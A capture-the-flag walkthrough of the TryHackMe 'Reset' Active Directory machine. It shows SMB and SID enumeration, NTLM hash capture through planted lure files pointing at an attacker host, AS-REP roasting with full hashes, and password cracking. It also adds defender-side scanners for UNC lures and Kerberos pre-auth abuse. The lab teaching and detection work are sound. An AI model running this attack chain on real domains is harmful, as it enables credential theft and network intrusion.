Reset
- 🌐 Website: TryHackMe
- 🔥 Level: Hard
- 🖥️ OS: Windows
- 🔗 Link: Reset
❓ Question
What is the user flag?
📋 Walkthrough
Let's run a quick nmap scan to see the open ports:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap --min-rate=10000 10.80.159.74 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-30 11:43 CET
Nmap scan report for 10.80.159.74
Host is up (0.44s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49676/tcp open unknown
49702/tcp open unknown
```
Let's run a more detailed nmap scan on the discovered ports:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap --min-rate=10000 -p53,135,139,389,445,464,593,636,3268,3269,3389,5985,7680,9389,49669,49670,49671,49673,49676,49702 -sV -sC 10.80.159.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-30 11:45 CET
Nmap scan report for 10.80.159.74
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-30T10:46:59+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-30T10:46:19+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-10-29T10:41:03
|_Not valid after: 2026-04-30T10:41:03
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-30T10:46:20
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.79 seconds
```
There's an active SMB service, so let's try to enumerate the shares with smbclient:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -L //10.80.159.74
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.80.159.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -N //10.80.159.74/Data
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 19 10:40:57 2023
.. D 0 Wed Jul 19 10:40:57 2023
onboarding D 0 Thu Oct 30 12:02:36 2025
7863807 blocks of size 4096. 3001613 blocks available
smb: \> cd onboarding
smb: \onboarding\> dir
. D 0 Thu Oct 30 12:03:36 2025
.. D 0 Thu Oct 30 12:03:36 2025
fyffawnb.qa1.pdf A 3032659 Mon Jul 17 10:12:09 2023
gy0x23zz.ref.pdf A 4700896 Mon Jul 17 10:11:53 2023
szvm0b0f.1ae.txt A 521 Mon Aug 21 20:21:59 2023
7863807 blocks of size 4096. 3001517 blocks available
smb: \onboarding\>
```
Let's download everything and analyze the files locally:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ cat iitvpket.vkr.txt
Subject: Welcome to Reset -
Dear <USER>,
Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.
The initial passowrd is: ResetMe123!
We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.
Best regards,
The Reset Team
```
We found the initial password: ResetMe123!
The PDFs are presentations. I checked them with exiftool for hidden information, but found nothing interesting. Opening one of the two, however, we see the same welcome text addressed to a different user: LILY ONEILL.
Before proceeding with a username brute-force attempt, I'd like to look at the remaining ports. Port 5985 (WinRM) answers HTTP, so let's try opening it in the browser:
I ran feroxbuster to see if there are any hidden directories, but there seems to be nothing. Let's try to log in to SMB using username variants based on LILY ONEILL with the password we found, ResetMe123!, but none of them work. We need more information. Let's try to enumerate users with rpcclient:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ rpcclient -U "thm.corp/guest" 10.80.159.74
Password for [THM.CORP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
```
Let's try with lookupsid:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-lookupsid THM.CORP/guest@10.80.159.74
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.80.159.74
[*] StringBinding ncacn_np:10.80.159.74[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1966530601-3185510712-10604624
498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: THM\Administrator (SidTypeUser)
501: THM\Guest (SidTypeUser)
502: THM\krbtgt (SidTypeUser)
512: THM\Domain Admins (SidTypeGroup)
513: THM\Domain Users (SidTypeGroup)
514: THM\Domain Guests (SidTypeGroup)
515: THM\Domain Computers (SidTypeGroup)
516: THM\Domain Controllers (SidTypeGroup)
517: THM\Cert Publishers (SidTypeAlias)
518: THM\Schema Admins (SidTypeGroup)
519: THM\Enterprise Admins (SidTypeGroup)
520: THM\Group Policy Creator Owners (SidTypeGroup)
521: THM\Read-only Domain Controllers (SidTypeGroup)
522: THM\Cloneable Domain Controllers (SidTypeGroup)
525: THM\Protected Users (SidTypeGroup)
526: THM\Key Admins (SidTypeGroup)
527: THM\Enterprise Key Admins (SidTypeGroup)
553: THM\RAS and IAS Servers (SidTypeAlias)
571: THM\Allowed RODC Password Replication Group (SidTypeAlias)
572: THM\Denied RODC Password Replication Group (SidTypeAlias)
1008: THM\HAYSTACK$ (SidTypeUser)
1109: THM\DnsAdmins (SidTypeAlias)
1110: THM\DnsUpdateProxy (SidTypeGroup)
1111: THM\3091731410SA (SidTypeUser)
1112: THM\ERNESTO_SILVA (SidTypeUser)
1113: THM\TRACY_CARVER (SidTypeUser)
1114: THM\SHAWNA_BRAY (SidTypeUser)
1115: THM\CECILE_WONG (SidTypeUser)
1116: THM\CYRUS_WHITEHEAD (SidTypeUser)
1117: THM\DEANNE_WASHINGTON (SidTypeUser)
1118: THM\ELLIOT_CHARLES (SidTypeUser)
1119: THM\MICHEL_ROBINSON (SidTypeUser)
1120: THM\MITCHELL_SHAW (SidTypeUser)
1121: THM\FANNY_ALLISON (SidTypeUser)
1122: THM\JULIANNE_HOWE (SidTypeUser)
1123: THM\ROSLYN_MATHIS (SidTypeUser)
1124: THM\DANIEL_CHRISTENSEN (SidTypeUser)
1125: THM\MARCELINO_BALLARD (SidTypeUser)
1126: THM\CRUZ_HALL (SidTypeUser)
1127: THM\HOWARD_PAGE (SidTypeUser)
1128: THM\STEWART_SANTANA (SidTypeUser)
1130: THM\LINDSAY_SCHULTZ (SidTypeUser)
1131: THM\TABATHA_BRITT (SidTypeUser)
1132: THM\RICO_PEARSON (SidTypeUser)
1133: THM\DARLA_WINTERS (SidTypeUser)
1134: THM\ANDY_BLACKWELL (SidTypeUser)
1135: THM\LILY_ONEILL (SidTypeUser)
1136: THM\CHERYL_MULLINS (SidTypeUser)
1137: THM\LETHA_MAYO (SidTypeUser)
1138: THM\HORACE_BOYLE (SidTypeUser)
1139: THM\CHRISTINA_MCCORMICK (SidTypeUser)
1141: THM\3811465497SA (SidTypeUser)
1142: THM\MORGAN_SELLERS (SidTypeUser)
1143: THM\MARION_CLAY (SidTypeUser)
1144: THM\3966486072SA (SidTypeUser)
1146: THM\TED_JACOBSON (SidTypeUser)
1147: THM\AUGUSTA_HAMILTON (SidTypeUser)
1148: THM\TREVOR_MELTON (SidTypeUser)
1149: THM\LEANN_LONG (SidTypeUser)
1150: THM\RAQUEL_BENSON (SidTypeUser)
1151: THM\AN-173-distlist1 (SidTypeGroup)
1152: THM\Gu-gerardway-distlist1 (SidTypeGroup)
1154: THM\CH-ecu-distlist1 (SidTypeGroup)
1156: THM\AUTOMATE (SidTypeUser)
```
I was at a dead end here, but I noticed a user called AUTOMATE. It's probably an account used to run automated tasks, such as replacing the files in the Data share. Let's try using ntlm_theft to generate files that will capture this user's hash:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ python3 ../ntlm_theft/ntlm_theft.py -g all -s 192.168.142.170 -f test
/home/kali/Desktop/THM/../ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/test.library-ms (BROWSE TO FOLDER)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Created: test/test.theme (THEME TO INSTALL
Generation Complete.
```
```sh
┌──(kali㉿kali)-[~/Desktop/THM/test]
└─$ smbclient //10.80.159.74/Data -U "THM\LILY_ONAIL"
Password for [THM\LILY_ONAIL]:
Try "help" to get a list of possible commands.
smb: \> cd onboarding
smb: \onboarding\> mput *
Put file test-(remotetemplate).docx? y
putting file test-(remotetemplate).docx as \onboarding\test-(remotetemplate).docx (83.4 kB/s) (average 83.4 kB/s)
Put file test.lnk? y
putting file test.lnk as \onboarding\test.lnk (12.6 kB/s) (average 58.4 kB/s)
...
```
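The files just uploaded work because Explorer resolves certain shortcut fields on its own (icon locations as soon as the folder is listed, URLs when the shortcut is opened) and will authenticate to whatever UNC host those fields name. The scanner below is a defender-side check I added here; it is not code from this writeup or from ntlm_theft. It reads the INI-style lure formats from the list above (.scf, .url, desktop.ini) and flags any auto-resolved field that points at a host outside an allowlist. The share contents and the allowlisted host fileserver.thm.corp are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# INI keys that Explorer resolves without user interaction: IconFile/IconResource
# when the folder is merely browsed, URL/WorkingDirectory when the file is opened.
AUTO_RESOLVED_KEYS = {"iconfile", "iconresource", "url", "workingdirectory"}

UNC_RE = re.compile(r"\\\\([^\\\s,]+)\\")                        # \\host\share\...
FILE_URL_RE = re.compile(r"file://([^/\s]+)/", re.IGNORECASE)   # file://host/...


@dataclass(frozen=True)
class Finding:
    filename: str
    key: str
    host: str


def remote_host(value: str) -> Optional[str]:
    """Host named by a UNC path or file:// URL in a field value, else None."""
    match = UNC_RE.search(value) or FILE_URL_RE.search(value)
    return match.group(1).lower() if match else None


def scan_ini_text(filename: str, text: str, trusted_hosts: set) -> list:
    """Parse key=value lines of one shortcut file and flag untrusted remote hosts."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("[", ";")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower() not in AUTO_RESOLVED_KEYS:
            continue
        host = remote_host(value.strip())
        if host and host not in trusted_hosts:
            findings.append(Finding(filename, key.strip(), host))
    return findings


def scan_share(files: dict, trusted_hosts: set) -> list:
    """files maps filename -> text content, e.g. read from a share listing."""
    findings = []
    for name, text in files.items():
        lower = name.lower()
        if lower.endswith((".scf", ".url")) or lower == "desktop.ini":
            findings.extend(scan_ini_text(name, text, trusted_hosts))
    return sorted(findings, key=lambda f: (f.filename, f.key))


# Constructed share contents; 192.0.2.10 stands in for an attacker-controlled host.
SAMPLE_FILES = {
    "test.scf": "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\test.ico\n[Taskbar]\nCommand=ToggleDesktop\n",
    "test-(icon).url": "[InternetShortcut]\nURL=https://example.com\nIconIndex=1\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n",
    "test-(url).url": "[InternetShortcut]\nURL=file://192.0.2.10/share/test.html\n",
    "desktop.ini": "[.ShellClassInfo]\nIconResource=\\\\192.0.2.10\\share\\icon.ico,0\n",
    "bing.url": "[InternetShortcut]\nURL=https://www.bing.com\nIconFile=\\\\fileserver.thm.corp\\icons\\bing.ico\n",
    "readme.url": "[InternetShortcut]\nURL=https://intranet.thm.corp/onboarding\n",
}
TRUSTED_HOSTS = {"fileserver.thm.corp"}   # constructed allowlist of known file servers

if __name__ == "__main__":
    for f in scan_share(SAMPLE_FILES, TRUSTED_HOSTS):
        print(f"{f.filename}: {f.key} -> \\\\{f.host}")
```

Run it periodically over writable shares such as Data\onboarding; a hit on a host that is not a known file server is a strong signal that someone has planted a hash-harvesting file. Binary formats (.lnk, the Office documents) need their own parsers, so this scanner deliberately reports only the text-based lures.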
Starting `responder` to listen on SMB and NBNS, and waiting for one of the files generated by `ntlm_theft` to be opened, we capture the NTLMv2 challenge-response hash of the `AUTOMATE` user:
```sh
[SMB] NTLMv2-SSP Client   : 10.80.159.74
[SMB] NTLMv2-SSP Username : THM\AUTOMATE
[SMB] NTLMv2-SSP Hash     : AUTOMATE::THM:8ad41084d...
[*] Skipping previously captured hash for THM\AUTOMATE
[*] Skipping previously captured hash for THM\AUTOMATE
[*] Skipping previously captured hash for THM\AUTOMATE
[*] Skipping previously captured hash for THM\AUTOMATE
```
Let's take the hash and try to crack it with `john`:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Passw0rd1 (AUTOMATE)
1g 0:00:00:00 DONE (2025-11-26 11:07) 20.00g/s 4669Kp/s 4669Kc/s 4669KC/s froggy27..supergirl8
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We have the password: Passw0rd1. Let's try to log in with evil-winrm:
Unfortunately I can't get in with this method. Let's try something else.
I was at a dead end here, so I tried GetNPUsers.py from impacket to see whether it was possible to get the hash of any user (accounts with Kerberos pre-authentication disabled). I created a users.txt file with all the users found (one per line) and ran the command:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-GetNPUsers -no-pass 'thm.corp/' -dc-ip 10.82.165.20 -request -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User HAYSTACK$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User 3091731410SA doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$ERNESTO_SILVA@THM.CORP:4d4b34b52412b30f44e62358ec7987fe$47b02cd32687a902c4ce82d5bdbd28b577fedaf4abc90506b272c96f55566967f45be20cfda7cf14d1bca5e49bca5221870412f78977f739118b5cb00861a00035d0ae11777922e50ea81b93734dbf15188f373f20b9f5d6625b38587cde9a02b9b666987bf7af0525101a17e05cc0d64de8c01a475c6ffbfbb400d80f436c40dd295e9594eea531e9bbcdafa776d0ec525a8669e0d0ce635be4d4a8a5c1482863ce1c954caa332a84720c0ce9569862332c11db26d4d7c92a5842a4fbeef65ce7ff310881a8eee4922799d96cc3063ce7d70a51a5fb8c13639aeec6f588c2489429d64e
[-] User TRACY_CARVER doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SHAWNA_BRAY doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CECILE_WONG doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CYRUS_WHITEHEAD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DEANNE_WASHINGTON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ELLIOT_CHARLES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MICHEL_ROBINSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MITCHELL_SHAW doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User FANNY_ALLISON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JULIANNE_HOWE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROSLYN_MATHIS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DANIEL_CHRISTENSEN doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MARCELINO_BALLARD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CRUZ_HALL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HOWARD_PAGE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User STEWART_SANTANA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User LINDSAY_SCHULTZ doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$TABATHA_BRITT@THM.CORP:9baf8dbdf15b582b2a7078470f10ea7d$8f7f596df6f5654aa96ff7fccffbb9e398d01c34132e25da5524c170dfba07a636f51c7e06c8b0bb6f091689c2090da4fdba4814b6c5a7c2a71ba4d7089501c43b1abad35d4ed52b6ce21342e72659ab9c3c408368ad0aae0e819f342ba3479b3a471cf97bf5d8a0502f9a058c625970901952136cef174bf5fd6f179371ea7a172bedd4f55784ca4f6f464fe640034b3931af4ace7c9b4613ed0f84ad3e88dc757fc2916a37595d7a548b56e7e2d9578df0399813d02c89a6b7403a97a27f86e33efec7b1922b61a7931dd3f421bc47564566cf2954e5fb33d632fab515582eef9becd7
[-] User RICO_PEARSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARLA_WINTERS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ANDY_BLACKWELL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CHERYL_MULLINS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User LETHA_MAYO doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HORACE_BOYLE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CHRISTINA_MCCORMICK doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User 3811465497SA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MORGAN_SELLERS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MARION_CLAY doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User 3966486072SA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User TED_JACOBSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User AUGUSTA_HAMILTON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User TREVOR_MELTON doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$LEANN_LONG@THM.CORP:0191665d71f20fca80cc3858b3e47960$0702590b2f551ca7e15fbd1aac951dac64133f6b2a9dc339631dbdbbfa795aa14b4e4c307e45f226fee09bd0786b9d2ac195bdbd4de0ab5c4536b9da92d796159785c0e3cc269a927e202fc8372c6b8a4cda4111f597b3d66bd4264047642cb2ae8ecb729c2100c50562ef16a28bfc06397adcf94b9bdf0598b49517d3b55cdd85c128aea49062459f436ecf0bae16ded091815bb6974a184744fd37a12de643a52950df3f211d99c71f76de10e06372197616b11271293b164faed8906d61bc78ffdd33aff670fa692f506c53d50ac5482baf6b4948d83b31ea8763b3b5f86c96686b4d
[-] User RAQUEL_BENSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User AUTOMATE doesn't have UF_DONT_REQUIRE_PREAUTH set
```
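The three `$krb5asrep$23$` lines mean the KDC handed out an AS-REP for those accounts without any pre-authentication and encrypted with RC4 (etype 23), which is what makes them crackable offline; the long run of KDC_ERR_C_PRINCIPAL_UNKNOWN replies is what a user list being tried against the KDC looks like from the domain controller's side. As an added example (mine, not code from this writeup or from impacket), the detection logic below runs over constructed Security event 4768 records and raises one alert per AS-REP issued without pre-authentication and one per source address that triggers too many unknown-principal errors. The field names follow event 4768 (PreAuthType, TicketEncryptionType, Status, IpAddress); every sample value is constructed.

```python
from collections import Counter
from dataclasses import dataclass

# Values as they appear in Security event 4768 (Kerberos TGT request).
PREAUTH_TYPE_NONE = "0"            # AS-REP issued without proof of the password
ETYPE_RC4_HMAC = "0x17"            # RC4 ticket: crackable with the password alone
STATUS_SUCCESS = "0x0"
STATUS_PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN


@dataclass(frozen=True)
class Alert:
    rule: str
    source_ip: str
    detail: str


def detect_asrep_roasting(events, enum_threshold=3):
    """Return alerts for AS-REP roasting and for Kerberos user enumeration."""
    alerts = []
    unknown_by_ip = Counter()
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        ip = ev.get("IpAddress", "?")
        status = ev.get("Status")
        if status == STATUS_PRINCIPAL_UNKNOWN:
            unknown_by_ip[ip] += 1
        elif status == STATUS_SUCCESS and ev.get("PreAuthType") == PREAUTH_TYPE_NONE:
            etype = ev.get("TicketEncryptionType")
            severity = "high" if etype == ETYPE_RC4_HMAC else "medium"
            alerts.append(Alert("asrep-without-preauth", ip,
                                f"{ev['TargetUserName']} etype={etype} severity={severity}"))
    for ip, count in unknown_by_ip.items():
        if count >= enum_threshold:
            alerts.append(Alert("kerberos-user-enumeration", ip,
                                f"{count} KDC_ERR_C_PRINCIPAL_UNKNOWN replies"))
    return alerts


def ev(user, status, preauth, etype, ip="10.50.1.23"):
    """Build one constructed 4768 record with the fields the rule reads."""
    return {"EventID": 4768, "TargetUserName": user, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype, "IpAddress": ip}


# Constructed log: a wordlist being tried (three unknown principals), three
# roastable AS-REPs, and two normal requests (PA-ENC-TIMESTAMP, AES256).
SAMPLE_EVENTS = [
    ev("jdoe", "0x6", "-", "-"),
    ev("admin", "0x6", "-", "-"),
    ev("backup", "0x6", "-", "-"),
    ev("ERNESTO_SILVA", "0x0", "0", "0x17"),
    ev("TABATHA_BRITT", "0x0", "0", "0x17"),
    ev("LEANN_LONG", "0x0", "0", "0x17"),
    ev("AUTOMATE", "0x0", "2", "0x12", ip="10.50.1.40"),
    ev("HAYSTACK$", "0x0", "2", "0x12", ip="10.50.1.40"),
]

if __name__ == "__main__":
    for alert in detect_asrep_roasting(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.source_ip}: {alert.detail}")
```

The fix on the directory side is to clear the "Do not require Kerberos preauthentication" flag on those three accounts and, independently, to stop issuing RC4 tickets, which turns a cheap offline crack into a PBKDF2-based one even if the flag is set again later.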
I obtained the hashes of 3 users: ERNESTO_SILVA, TABATHA_BRITT and LEANN_LONG. I saved them in a hash file and tried to crack them with john using the rockyou.txt wordlist:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
marlboro(1985) ($krb5asrep$23$TABATHA_BRITT@THM.CORP)
1g 0:00:00:02 DONE (2025-11-26 12:16) 0.4310g/s 6182Kp/s 8669Kc/s 8669KC/s !SkicA!..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
For TABATHA_BRITT the password is marlboro(1985). The user is allowed to log in via RDP, so let's connect and look for the first flag, but I can't find it. Among the users I notice the AUTOMATE account, so I open PowerShell as this user:
```powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\automate
....
PS C:\Users\automate> tree /F
Folder PATH listing
Volume serial number is A8A4-C362
C:.
├───3D Objects
├───Contacts
├───Desktop
│ EC2 Feedback.website
│ EC2 Microsoft Windows Guide.website
│ user.txt
│
├───Documents
├───Downloads
├───Favorites
│ │ Bing.url
│ │
│ └───Links
├───Links
│ Desktop.lnk
│ Downloads.lnk
│
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos
PS C:\Users\automate>
```
Answer
THM{AUTOMATION_WILL_REPLACE_US}
❓ Question
What is the user flag?
📋 Walkthrough
Now let's try to do privilege escalation by finding attack paths with BloodHound. Let's download and start the BloodHound GUI, and collect the domain data with bloodhound-python:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ bloodhound-python -d "THM.CORP" -u "TABATHA_BRITT" -p "marlboro(1985)" -ns 10.82.165.20 -c ALL
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.corp
INFO: Getting TGT for user
INFO: Successfully authenticated to LDAP as THM.CORP\TABATHA_BRITT
INFO: Starting LDAP Enumeration
...
